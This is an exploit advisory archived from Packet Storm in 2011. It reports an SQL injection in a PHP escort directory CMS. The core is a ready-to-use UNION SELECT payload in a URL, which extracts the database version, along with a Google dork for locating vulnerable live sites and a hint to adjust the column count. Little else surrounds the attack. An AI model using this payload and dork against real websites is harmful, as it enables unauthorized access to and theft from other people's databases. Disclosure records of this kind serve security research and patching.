Escort Directory CMS SQL Injection

2011-02-20T00:00:00
ID PACKETSTORM:98622
Type packetstorm
Reporter NoNameMT
Modified 2011-02-20T00:00:00

Description

                                        
                                            `# Exploit Title: Escort Directory CMS SQL Injection Vunerability  
# Google Dork: "Powered By Escort Web design"  
# Platform: php  
# Date: 09.02.2011  
# Author: NoNameMT  
# Software Link: http://www.escortwebsitedesign.co.uk/directory-design/  
# Price: 750 €  
# Tested on: Windows 7  
# Mail: nonamemt@gmail.com  
# Homepage: http://nonamemt.us  
  
# Exploit:  
http://localhost/main/HotBrunette,-3+union+select+1,2,version(),4,5,6,7--+  
  
Maybe there a diffrent number of columns  
  
# Greetings:  
J0hn.X3r, 4004-security-project.com, TamCore, bursali, theeddy42,  
Nightmare_FH  
  
`